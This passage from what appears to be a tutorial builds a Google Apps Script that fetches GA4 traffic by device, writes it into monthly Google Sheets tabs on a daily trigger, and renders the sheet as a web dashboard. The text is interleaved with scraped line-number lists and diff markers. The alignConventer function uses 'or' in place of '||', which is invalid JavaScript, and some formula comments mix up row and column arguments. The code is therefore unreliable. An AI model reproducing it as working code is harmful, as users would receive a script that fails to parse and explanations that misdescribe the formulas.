+ this.backgroundColor = "#e3284b";
+ this.bold = false;
+ this.size = 12;
+ this.horizontalAlignment = "center";
+ this.verticalAlignment = "middle";
+ }
+}
+
+class ContentStyle {
+ constructor() {
+ this.color = "#000000";
+ this.backgroundColor = "#ffffff";
+ this.bold = false;
+ this.size = 12;
+ this.horizontalAlignment = "center";
+ this.verticalAlignment = "middle";
+ }
+}
+
+class HeaderDateStyle {
+ constructor() {
+ this.color = "#ffffff";
+ this.backgroundColor = "#001a40";
+ this.bold = true;
+ this.size = 12;
+ this.horizontalAlignment = "center";
+ this.verticalAlignment = "middle";
+ }
+}
+
DailyReportField.gs
field data object:
1
+2
+3
+4
+5
+6
+7
+8
+9
+
class DailyReportField {
+ constructor(name, headerStyle, contentStyle, format = null, value = null) {
+ this.name = name;
+ this.headerStyle = headerStyle;
+ this.contentStyle = contentStyle;
+ this.format = format;
+ this.value = value;
+ }
+}
+
DailyReport.gs
main report program logic:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+
class DailyReport {
+ constructor(sheetID, date) {
+ this.separateSheet = SpreadsheetApp.openById(sheetID);
+ this.date = date;
+
+ this.sheetFields = [
+ new DailyReportField("Date", new HeaderDateStyle(), new HeaderDateStyle()),
+ new DailyReportField("Day of the Week", new HeaderDateStyle(), new HeaderDateStyle()),
+ new DailyReportField("Daily Traffic", new HeaderStyle(), new ContentStyle(), "#,##0", '=INDIRECT(SUBSTITUTE(ADDRESS(1,COLUMN(),4),"1","")&4)+INDIRECT(SUBSTITUTE(ADDRESS(1,COLUMN(),4),"1","")&5)'), // =4(PC Traffic) + 5(Mobile Traffic)
+ new DailyReportField("PC Traffic", new HeaderStyle(), new ContentStyle(), "#,##0"),
+ new DailyReportField("Mobile Traffic", new HeaderStyle(), new ContentStyle(), "#,##0"),
+ new DailyReportField("Registrations", new HeaderStyle(), new ContentStyle(), "#,##0")
+ ]
+
+ // Explanation of the daily traffic formula:
+ // 1. The COLUMN() function returns the column number of the current cell.
+ // 2. ADDRESS(1, COLUMN(), 4) generates an absolute reference address with the given row number (result of `COLUMN()`) and fixed column number (1). The third parameter 4 indicates a relative address without any dollar signs ($). For example, if you use this function in any cell in the third column, it will return "C1".
+ // 3. SUBSTITUTE(ADDRESS(1, COLUMN(), 4), "1", "") removes the number 1 from the address generated by the ADDRESS function, leaving only the column letter, e.g., "C".
+ // 4. INDIRECT(SUBSTITUTE(ADDRESS(1, COLUMN(), 4), "1", "") & 4) here & 4 should actually be &4. The result of the `SUBSTITUTE` function is concatenated with the number 4, forming a string like "C4", and then the INDIRECT function converts this string into the corresponding cell reference. So, if you use this formula in any cell in column C, it will reference C4.
+ // 5. Similarly, `INDIRECT(SUBSTITUTE(ADDRESS(1, COLUMN(), 4), "1", "") & 5)` references the cell in the fifth row of the same column. For example, if you use this formula in any cell in column C, it will reference C5.
+ // 6. Finally, the values of the cells referenced by these two INDIRECT functions are added together.
+ }
+
+ execute() {
+ const sheet = this.getSheet();
+
+ }
+
+ // Get the target Sheet for the given date
+ getSheet() {
+ // Distinguish Sheets by month, find the current month's Sheet
+ var thisMonthSheet = this.separateSheet.getSheetByName(this.getSheetName());
+ if (thisMonthSheet == null) {
+ // If not found, create a new monthly Sheet
+ thisMonthSheet = this.makeMonthSheet();
+ }
+
+ return thisMonthSheet;
+ }
+
+ // Monthly Sheet naming convention
+ getSheetName() {
+ return Utilities.formatDate(this.date, "GMT+8", "yyyy-MM");
+ }
+
+ // Create a new monthly Sheet
+ makeMonthSheet() {
+ // Add the current month's Sheet, move it to the first position
+ var thisMonthSheet = this.separateSheet.insertSheet(this.getSheetName(), {index: 0});
+ thisMonthSheet.activate();
+ this.separateSheet.moveActiveSheet(1);
+
+ // Add the first column, field names, set Pinned, width 200
+ thisMonthSheet.insertColumnsBefore(1, 1);
+ thisMonthSheet.setFrozenColumns(1);
+ thisMonthSheet.setColumnWidths(1, 1, 200);
+
+ // Fill in the field names
+ for(const currentRow in this.sheetFields) {
+ const sheetField = this.sheetFields[currentRow];
+ const text = sheetField.name;
+ const style = sheetField.headerStyle;
+
+ const range = thisMonthSheet.getRange(parseInt(currentRow) + 1, 1);
+ this.setContent(range, text, style);
+ range.setHorizontalAlignment("left");
+ }
+
+ // Set row heights
+ thisMonthSheet.setRowHeights(1, Object.keys(this.sheetFields).length, 30);
+
+ // Set Pinned for the first and second rows (Date, Day of the Week)
+ thisMonthSheet.setFrozenRows(2);
+
+ // Add a summary column
+ thisMonthSheet.insertColumnsAfter(thisMonthSheet.getLastColumn(), 1); // Add one column after the last column
+ const summaryColumnIndex = thisMonthSheet.getLastColumn() + 1;
+
+ // Fill in the summary column
+ for(const currentRow in this.sheetFields) {
+ const sheetField = this.sheetFields[currentRow];
+ const summaryRowIndex = parseInt(currentRow) + 1;
+
+ const range = thisMonthSheet.getRange(summaryRowIndex, summaryColumnIndex);
+ const style = sheetField.contentStyle;
+
+ if (summaryRowIndex == 1) {
+ // Date...
+ this.setContent(range, "Total", style);
+ } else if (summaryRowIndex == 2) {
+ // Day of the Week...merge...
+ const mergeRange = thisMonthSheet.getRange(1, summaryColumnIndex, summaryRowIndex, 1);
+ this.setContent(mergeRange, "Total", style);
+ mergeRange.merge();
+ } else {
+ this.setContent(range, '=IFERROR(SUM(INDIRECT(SUBSTITUTE(ADDRESS(1, 1, 4), "1", "") & '+summaryRowIndex+'):INDIRECT(SUBSTITUTE(ADDRESS(1, COLUMN() - 1, 4), "1", "") & '+summaryRowIndex+')), 0)', style);
+
+ // 1. The IFERROR(value, [value_if_error]) function is used to check if there is an error in the formula and return a specified value if there is an error. It takes two parameters: `value` is the expression or function to be calculated, and `value_if_error` is the value returned when value has an error. In this context, if the calculation in the SUM function has an error, it returns 0.
+ // 2. The SUM(range) function is used to calculate the sum of all numbers in the range.
+ // 3. The INDIRECT(ref_text, [is_A1_notation]) function converts a text string into a cell reference. Here, the INDIRECT function is used to dynamically generate the required reference range.
+ // 4. The SUBSTITUTE(text, old_text, new_text, [instance_num]) function replaces specified text in a text string. Here, SUBSTITUTE is used to replace the "1" in the address returned by the ADDRESS function with other content.
+ // 5. The ADDRESS(row, column, [abs_num], [a1], [sheet]) function returns the cell address corresponding to the given row and column numbers. Here, ADDRESS(1, 1, 4) generates the cell address of the first row and first column, but since abs_num is 4, the address does not include the worksheet name and fixed symbol $. Similarly, `ADDRESS(1, COLUMN() - 1, 4)` generates the cell address from the first row to the previous column of the current column.
+ // 6. The COLUMN() function returns the column number of the current cell.
+ // 7. summaryRowIndex = the row number
+ }
+ }
+
+ return thisMonthSheet;
+ }
+
+ setContent(range, text, style) {
+ if (String(text) != "") {
+ range.setValue(text);
+ }
+
+ range.setBackgroundColor(style.backgroundColor);
+ range.setFontColor(style.color);
+
+ if (style.bold) {
+ range.setFontWeight("bold");
+ }
+
+ range.setHorizontalAlignment(style.horizontalAlignment);
+ range.setVerticalAlignment(style.verticalAlignment);
+ range.setFontSize(style.size);
+ range.setBorder(true, true, true, true, true, true, "black", SpreadsheetApp.BorderStyle.SOLID);
+ }
+}
+
Main.gs
as the main program entry point:
1
+2
+3
+4
+5
+6
+7
+
const targetGoogleSheetID = "1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE"
+// https://docs.google.com/spreadsheets/d/1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE/edit#gid=275710641
+
+function debug() {
+ var report = new DailyReport(targetGoogleSheetID, new Date());
+ report.execute();
+}
+
After completion, we return to Main.gs
, select “debug” and press debug to check if the execution result is correct and if there are any errors.
If executed correctly, the report will show the current new month, with default fields and total fields. If it already exists, there will be no response.
First, you need to add the “AnalyticsData” service:
Use the GA4 Debug Tool to construct query conditions:
Log in and authorize, then select the target resource:
Note down the number displayed under the property, which is the GA Property ID you want to query.
Set query parameters and Filter conditions:
Press “Make Request” to get the Response result:
You can simultaneously compare the data with the same conditions in the GA 4 backend to see if they match. If there is a significant difference, it might be because some Filter conditions were not added, so you need to check again.
A small pitfall discovered by a marketing colleague: some GA data may have delay issues, meaning the numbers you check today might be different from those you checked yesterday (e.g., bounce rate). Therefore, it’s best to backtrack the data a few days to ensure the final numbers are accurate.
After confirming that the GA Debug Tool is working correctly, we can convert it into Google Apps Script.
Add a new GAData.gs
file:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+
// Remember to add Google Analytics Data API to Services, or you'll see this error: ReferenceError: AnalyticsData is not defined
+// GA Debug Tool: https://ga-dev-tools.web.app/ga4/query-explorer/
+
+class GAData {
+ constructor(date) {
+ this.date = date;
+
+ const traffic = this.fetchGADailyUsage();
+ this.pc_traffic = traffic["desktop"];
+ this.mobile_traffic = traffic["mobile"];
+ }
+
+ fetchGADailyUsage() {
+ const dimensionPlatform = AnalyticsData.newDimension();
+ dimensionPlatform.name = "deviceCategory";
+
+ const metric = AnalyticsData.newMetric();
+ metric.name = "sessions";
+
+ const dateRange = AnalyticsData.newDateRange();
+ // Default query for data within the given date range e.g. 2024-01-01 ~ 2024-01-01
+ dateRange.startDate = this.getDateString();
+ dateRange.endDate = this.getDateString();
+
+ // Filter Example:
+ // const filterExpression = AnalyticsData.newFilterExpression();
+ // const filter = AnalyticsData.newFilter();
+ // filter.fieldName = "landingPagePlusQueryString";
+ // const stringFilter = AnalyticsData.newStringFilter()
+ // stringFilter.value = "/life|/article|/chat|/house|/event/230502|/event/230310";
+ // stringFilter.matchType = "PARTIAL_REGEXP";
+ // filter.stringFilter = stringFilter;
+ // filterExpression.filter = filter;
+
+ const request = AnalyticsData.newRunReportRequest();
+ request.dimensions = [dimensionPlatform];
+ request.metrics = [metric];
+ request.dateRanges = dateRange;
+
+ // Filter Example:
+ // const filterExpression = AnalyticsData.newFilterExpression();
+ // filterExpression.expression = filterExpression;
+ // request.dimensionFilter = filterExpression;
+ // or Not
+ // const notFilterExpression = AnalyticsData.newFilterExpression();
+ // notFilterExpression.notExpression = filterExpression;
+ // request.dimensionFilter = notFilterExpression;
+
+ const report = AnalyticsData.Properties.runReport(request, "properties/" + gaPropertyId).rows;
+ // No data
+ if (report == undefined) {
+ return {"desktop": 0, "mobile": 0};
+ }
+
+ // [{metricValues=[{value=4517}], dimensionValues=[{value=mobile}]}, {metricValues=[{value=3189}], dimensionValues=[{value=desktop}]}, {metricValues=[{value=63}], dimensionValues=[{value=tablet}]}]
+
+ var result = {};
+ report.forEach(function(element) {
+ result[element.dimensionValues[0].value] = element.metricValues[0].value;
+ });
+
+ return result;
+ }
+
+ getDateString() {
+ return Utilities.formatDate(this.date, "GMT+8", "yyyy-MM-dd");
+ }
+}
+
Main.gs
Add test content:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+
const targetGoogleSheetID = "1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE";
+// https://docs.google.com/spreadsheets/d/1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE/edit#gid=275710641
+
+const gaPropertyId = "318495208";
+
+function debug() {
+ var report = new DailyReport(targetGoogleSheetID, new Date());
+ report.execute();
+ //
+ var gaData = new GAData(new Date());
+ Logger.log(gaData);
+}
+
Press run or debug to get the program fetch result:
OK! The comparison matches.
When this step is completed, the directory file structure is as shown above.
After creating the Sheet and checking the data, the next step is to fill in the data into the fields.
Adjust DailyReport.gs
to add logic for adding fields & filling data by date:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+129
+130
+131
+132
+133
+134
+135
+136
+137
+138
+139
+140
+141
+142
+143
+144
+145
+146
+147
+148
+149
+150
+151
+152
+153
+154
+155
+156
+157
+158
+159
+160
+161
+162
+163
+164
+165
+166
+167
+168
+169
+170
+171
+172
+173
+174
+175
+176
+177
+178
+179
+
class DailyReport {
+ constructor(sheetID, date, gaData, inHouseReportData) {
+ this.separateSheet = SpreadsheetApp.openById(sheetID);
+ this.date = date;
+
+ const dateString = Utilities.formatDate(date, "GMT+8", "yyyy/MM/dd");
+ const weekString = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"][date.getDay()]; // Get the day of the week, Sunday is 0, Monday is 1, and so on
+
+ this.sheetFields = [
+ new DailyReportField("Date", new HeaderDateStyle(), new HeaderDateStyle(), null, dateString),
+ new DailyReportField("Day", new HeaderDateStyle(), new HeaderDateStyle(), null, weekString),
+ new DailyReportField("Daily Traffic", new HeaderStyle(), new ContentStyle(), "#,##0", '=INDIRECT(SUBSTITUTE(ADDRESS(1,COLUMN(),4),"1","")&4)+INDIRECT(SUBSTITUTE(ADDRESS(1,COLUMN(),4),"1","")&5)'), // =4(PC Traffic) + 5(Mobile Traffic)
+ new DailyReportField("PC Traffic", new HeaderStyle(), new ContentStyle(), "#,##0", gaData.pc_traffic),
+ new DailyReportField("Mobile Traffic", new HeaderStyle(), new ContentStyle(), "#,##0", gaData.mobile_traffic),
+ new DailyReportField("Registrations", new HeaderStyle(), new ContentStyle(), "#,##0", inHouseReportData.registers)
+ ]
+ }
+
+ execute() {
+ const sheet = this.getSheet();
+ const dateColumnIndex = this.makeOrGetDateColumn(sheet); // Get the existing update or create a new field
+
+ // Fill in the field content
+ for(const currentRow in this.sheetFields) {
+ const sheetField = this.sheetFields[currentRow];
+ const rowIndex = parseInt(currentRow) + 1;
+
+ if (rowIndex != null) {
+ const range = sheet.getRange(rowIndex, dateColumnIndex);
+ const text = sheetField.value;
+ const style = sheetField.contentStyle;
+ this.setContent(range, text, style);
+ this.setFormat(range, sheetField.format);
+ }
+ }
+ }
+
+ // Get the target Sheet for the given date
+ getSheet() {
+ // Distinguish Sheets by month, find the current month's Sheet
+ var thisMonthSheet = this.separateSheet.getSheetByName(this.getSheetName());
+ if (thisMonthSheet == null) {
+ // If not found, create a new month Sheet
+ thisMonthSheet = this.makeMonthSheet();
+ }
+
+ return thisMonthSheet;
+ }
+
+ // Month Sheet naming
+ getSheetName() {
+ return Utilities.formatDate(this.date, "GMT+8", "yyyy-MM");
+ }
+
+ // Create a new month Sheet
+ makeMonthSheet() {
+ // Add the current month's Sheet, move to the first position
+ var thisMonthSheet = this.separateSheet.insertSheet(this.getSheetName(), {index: 0});
+ thisMonthSheet.activate();
+ this.separateSheet.moveActiveSheet(1);
+
+ // Add the first column, field name, set Pinned, width 200
+ thisMonthSheet.insertColumnsBefore(1, 1);
+ thisMonthSheet.setFrozenColumns(1);
+ thisMonthSheet.setColumnWidths(1, 1, 200);
+
+ // Fill in the field names
+ for(const currentRow in this.sheetFields) {
+ const sheetField = this.sheetFields[currentRow];
+ const text = sheetField.name;
+ const style = sheetField.headerStyle;
+
+ const range = thisMonthSheet.getRange(parseInt(currentRow) + 1, 1);
+ this.setContent(range, text, style);
+ range.setHorizontalAlignment("left");
+ }
+
+ // Set row height
+ thisMonthSheet.setRowHeights(1, Object.keys(this.sheetFields).length, 30);
+
+ // Set Pinned for the first and second rows (Date, Day)
+ thisMonthSheet.setFrozenRows(2);
+
+ // Add total field
+ thisMonthSheet.insertColumnsAfter(thisMonthSheet.getLastColumn(), 1); // Add a column after the last column
+ const summaryColumnIndex = thisMonthSheet.getLastColumn() + 1;
+
+ // Fill in the total field
+ for(const currentRow in this.sheetFields) {
+ const sheetField = this.sheetFields[currentRow];
+ const summaryRowIndex = parseInt(currentRow) + 1;
+
+ const range = thisMonthSheet.getRange(summaryRowIndex, summaryColumnIndex);
+ const style = sheetField.contentStyle;
+
+ if (summaryRowIndex == 1) {
+ // Date...
+ this.setContent(range, "Total", style);
+ } else if (summaryRowIndex == 2) {
+ // Day...merge...
+ const mergeRange = thisMonthSheet.getRange(1, summaryColumnIndex, summaryRowIndex, 1);
+ this.setContent(mergeRange, "Total", style);
+ mergeRange.merge();
+ } else {
+ this.setContent(range, '=IFERROR(SUM(INDIRECT(SUBSTITUTE(ADDRESS(1, 1, 4), "1", "") & '+summaryRowIndex+'):INDIRECT(SUBSTITUTE(ADDRESS(1, COLUMN() - 1, 4), "1", "") & '+summaryRowIndex+')), 0)', style);
+ }
+ }
+
+ return thisMonthSheet;
+ }
+
+ // Create or get the date field
+ // Add a field from the most recent day
+ makeOrGetDateColumn(sheet) {
+ const firstRowColumnsRange = sheet.getRange(1, 1, 1, sheet.getLastColumn()); // Get the data range of the first row (date)
+ const firstRowColumns = firstRowColumnsRange.getValues()[0]; // Get the values of the data range, 0 = first row
+
+ var columnIndex = firstRowColumns.findIndex((date) => (date instanceof Date && Utilities.formatDate(date, "GMT+8", "yyyy/MM/dd") == Utilities.formatDate(this.date, "GMT+8", "yyyy/MM/dd"))); // Find the index of the corresponding date field
+
+ if (columnIndex < 0) {
+ // Not Found, find the position of the previous day
+ var preDate = new Date(this.date);
+ preDate.setDate(preDate.getDate() - 1);
+
+ while(preDate.getMonth() == this.date.getMonth()) {
+ columnIndex = firstRowColumns.findIndex((date) => (date instanceof Date && Utilities.formatDate(date, "GMT+8", "yyyy/MM/dd") == Utilities.formatDate(preDate, "GMT+8", "yyyy/MM/dd")));
+ if (columnIndex >= 0) {
+ break;
+ }
+
+ preDate.setDate(preDate.getDate() - 1);
+ }
+
+ if (columnIndex >= 0) {
+ columnIndex += 1;
+ sheet.insertColumnsAfter(columnIndex, 1); // Add a column after the previous day's field
+ columnIndex += 1;
+ }
+ } else {
+ columnIndex += 1;
+ }
+
+ if (columnIndex < 0) {
+ sheet.insertColumnsAfter(1, 1); // Default, directly add a column after the first column
+ columnIndex = 2;
+ }
+
+ // Set column width
+ sheet.setColumnWidths(columnIndex , 1, 100);
+
+ return columnIndex
+ }
+
+ // Set field format style
+ setFormat(range, format) {
+ if (format != null) {
+ range.setNumberFormat(format);
+ }
+ }
+
+ // Fill content into the field
+ setContent(range, text, style) {
+ if (String(text) != "") {
+ range.setValue(text);
+ }
+
+ range.setBackgroundColor(style.backgroundColor);
+ range.setFontColor(style.color);
+
+ if (style.bold) {
+ range.setFontWeight("bold");
+ }
+
+ range.setHorizontalAlignment(style.horizontalAlignment);
+ range.setVerticalAlignment(style.verticalAlignment);
+ range.setFontSize(style.size);
+ range.setBorder(true, true, true, true, true, true, "black", SpreadsheetApp.BorderStyle.SOLID);
+ }
+}
+
Adjust Main.gs
to add data integration and assign values during the build phase:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+
const targetGoogleSheetID = "1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE";
+// https://docs.google.com/spreadsheets/d/1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE/edit#gid=275710641
+
+const gaPropertyId = "318495208";
+
+function debug() {
+ const date = new Date();
+ const gaData = new GAData(date);
+ const inHouseReportData = fetchInHouseReportData(date);
+
+ const report = new DailyReport(targetGoogleSheetID, date, gaData, inHouseReportData);
+ report.execute();
+
+}
+
+// Simulate some data that might be obtained by hitting other platform APIs.
+function fetchInHouseReportData(date) {
+ // EXAMPLE REQUEST:
+ // var options = {
+ // 'method' : 'get',
+ // 'headers': {
+ // 'Authorization': 'Bearer XXX'
+ // }
+ // };
+ // OR
+ // var options = {
+ // 'method' : 'post',
+ // 'headers': {
+ // 'Authorization': 'Bearer XXX'
+ // },
+ // 'payload' : data
+ // };
+
+ // var res = UrlFetchApp.fetch(url, options);
+ // const result = JSON.parse(res.getContentText());
+
+ // REMEMBER, DUE TO SECURITY REASON, We can't customize user-agent.
+
+ return {"registers": Math.floor(Math.random() * (180 - 30 + 1)) + 30} // MOCK DATA random 30~180
+}
+
After completion, go back to Main.gs
, select debug
, and press debug to check if the execution result is correct and if there are any errors.
Back to Google Sheet! Success! We have successfully added the data for the date automatically.
After completing the script, just set up the automatic trigger conditions to complete it automatically every day.
Adjust Main.gs
to add the cronjob()
function:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+
const targetGoogleSheetID = "1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE";
+// https://docs.google.com/spreadsheets/d/1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE/edit#gid=275710641
+
+const gaPropertyId = "318495208";
+
+function debug() {
+ cronjob();
+}
+
+// In reality, it is usually the data from yesterday that is checked today for complete data.
+function cronjob() {
+ const yesterday = new Date();
+ yesterday.setDate(yesterday.getDate() - 1);
+
+ const gaData = new GAData(yesterday);
+ const inHouseReportData = fetchInHouseReportData(yesterday);
+
+ const report = new DailyReport(targetGoogleSheetID, yesterday, gaData, inHouseReportData);
+ report.execute();
+}
+
+// Simulate some data that might be obtained by hitting other platform APIs.
+function fetchInHouseReportData(date) {
+ // EXAMPLE REQUEST:
+ // var options = {
+ // 'method' : 'get',
+ // 'headers': {
+ // 'Authorization': 'Bearer XXX'
+ // }
+ // };
+ // OR
+ // var options = {
+ // 'method' : 'post',
+ // 'headers': {
+ // 'Authorization': 'Bearer XXX'
+ // },
+ // 'payload' : data
+ // };
+
+ // var res = UrlFetchApp.fetch(url, options);
+ // const result = JSON.parse(res.getContentText());
+
+ // REMEMBER, DUE TO SECURITY REASON, We can't customize user-agent.
+
+ return {"registers": Math.floor(Math.random() * (180 - 30 + 1)) + 30} // MOCK DATA random 30~180
+}
+
Switch to the “Triggers” tab in the editor and select “Add Trigger” in the bottom right corner:
Main.gs
Function cronjob
Save the settings, and you’re done.
You can then go to the “Executions” tab to check the execution record results:
At this point, we have completed the RPA function for automating queries, adding data, and filling in data reports. 🎉🎉🎉
Next, there is a secondary requirement. We need to create a simple web display of daily data (similar to a war room concept) that will be directly displayed on a large screen on the wall behind the team.
The effect is as shown below:
Add Web_DailyReport.gs
to read Google Sheets and convert the columns and styles to HTML format for display:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+
class WebDailyReport {
+ constructor(sheetID, dayCount) {
+ this.separateSheet = SpreadsheetApp.openById(sheetID);
+ this.dayCount = dayCount;
+ this.sheetRows = [
+ "Date",
+ "Day of the Week",
+ "Daily Traffic",
+ "PC Traffic",
+ "Mobile Traffic",
+ "Registration Count"
+ ];
+ }
+
+ allData(startDate) {
+ var sheetRowsIndexs = {};
+ var count = this.dayCount;
+ var result = [];
+ while (count >= 0) {
+ const preDate = new Date(startDate);
+ preDate.setDate(preDate.getDate() - (this.dayCount - count));
+ const sheetName = Utilities.formatDate(preDate, "GMT+8", "yyyy-MM");
+ const targetSheet = this.separateSheet.getSheetByName(sheetName);
+ if (targetSheet != null) {
+ const firstRowColumnsRange = targetSheet.getRange(1, 1, 1, targetSheet.getLastColumn()); // Get the range of the first row (date)
+ const firstRowColumns = firstRowColumnsRange.getValues()[0]; // Get the values of the range, 0 = first row
+ var columnIndex = firstRowColumns.findIndex((date) => (date instanceof Date && Utilities.formatDate(date, "GMT+8", "yyyy/MM/dd") == Utilities.formatDate(preDate, "GMT+8", "yyyy/MM/dd"))); // Find the index of the corresponding date column
+
+ if (columnIndex >= 0) {
+ columnIndex = parseInt(columnIndex) + 1;
+ if (sheetRowsIndexs[sheetName] == undefined || sheetRowsIndexs[sheetName] == null) {
+ sheetRowsIndexs[sheetName] = this.sheetRows.map((sheetRow) => this.getFieldRow(targetSheet, sheetRow));
+ }
+
+ if (result.length == 0) {
+ // Add the first column
+ const ranges = sheetRowsIndexs[sheetName].map((rowIndex) => (rowIndex != null) ? (targetSheet.getRange(rowIndex, 1)) : (null));
+ result.push(this.makeValues(ranges));
+ }
+
+ const ranges = sheetRowsIndexs[sheetName].map((rowIndex) => (rowIndex != null) ? (targetSheet.getRange(rowIndex, columnIndex)) : (null));
+ result.push(this.makeValues(ranges));
+ }
+ }
+
+ count -= 1;
+ }
+
+ var transformResult = {};
+ for (const columnIndex in result) {
+ for (const rowIndex in result[columnIndex]) {
+ if (transformResult[rowIndex] == undefined) {
+ transformResult[rowIndex] = [];
+ }
+
+ if (columnIndex == 0) {
+ transformResult[rowIndex].unshift(result[columnIndex][rowIndex]);
+ } else {
+ transformResult[rowIndex].splice(1, 0, result[columnIndex][rowIndex]);
+ }
+
+ }
+ }
+
+ return transformResult;
+ }
+
+ // Convert field attributes to display objects
+ makeValues(ranges) {
+ const data = ranges.map((range) => (range != null) ? (range.getDisplayValues()) : (null)).map((values) => (values != null) ? (values[0][0]) : (null));
+ const backgroundColors = ranges.map((range) => (range != null) ? (range.getBackgrounds()) : (null)).map((values) => (values != null) ? (values[0][0]) : (null));
+ const colors = ranges.map((range) => (range != null) ? (range.getFontColorObjects()) : (null)).map((values) => (values != null) ? (values[0][0]) : (null));
+ const sizes = ranges.map((range) => (range != null) ? (range.getFontSizes()) : (null)).map((values) => (values != null) ? (values[0][0]) : (null));
+ const bolds = ranges.map((range) => (range != null) ? (range.getFontWeights()) : (null)).map((values) => (values != null) ? (values[0][0]) : (null));
+ const horizontalAlignments = ranges.map((range) => (range != null) ? (range.getHorizontalAlignments()) : (null)).map((values) => (values != null) ? (values[0][0]) : (null));
+ const verticalAlignments = ranges.map((range) => (range != null) ? (range.getVerticalAlignments()) : (null)).map((values) => (values != null) ? (values[0][0]) : (null));
+
+ var result = [];
+ for(const index in data) {
+ const row = data[index];
+ result.push({
+ "value": row,
+ "backgroundColor": backgroundColors[index],
+ "color": this.colorStripper(colors[index]?.asRgbColor()?.asHexString()),
+ "size": sizes[index],
+ "bold": bolds[index],
+ "horizontalAlignment": this.alignConventer(horizontalAlignments[index]),
+ "verticalAlignment": verticalAlignments[index]
+ });
+ }
+
+ return result;
+ }
+
+ colorStripper(colorString) {
+ if (colorString == undefined || colorString == null) {
+ return null
+ }
+
+ if (colorString.length == 9) {
+ return "#"+colorString.substring(3, 9);
+ } else {
+ return colorString;
+ }
+ }
+
+ alignConventer(horizontalAlignment) {
+ if (horizontalAlignment == undefined or horizontalAlignment == null) {
+ return null
+ }
+
+ return horizontalAlignment.replace('general-', '')
+ }
+
+ getFieldRow(sheet, name) {
+ const firstColumnRowsRange = sheet.getRange(1, 1, sheet.getLastRow(), 1); // Get the range of the first column (field)
+ const firstColumnRows = firstColumnRowsRange.getValues(); // Get the values of the range
+ const foundIndex = firstColumnRows.findIndex((firstColumnRow) => firstColumnRow[0] == name);
+
+ if (foundIndex < 0) {
+ return null;
+ } else {
+ return foundIndex + 1;
+ }
+ }
+}
+
Main.gs
Add Web Request Handle:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+
const targetGoogleSheetID = "1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE";
+// https://docs.google.com/spreadsheets/d/1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE/edit#gid=275710641
+
+const gaPropertyId = "318495208";
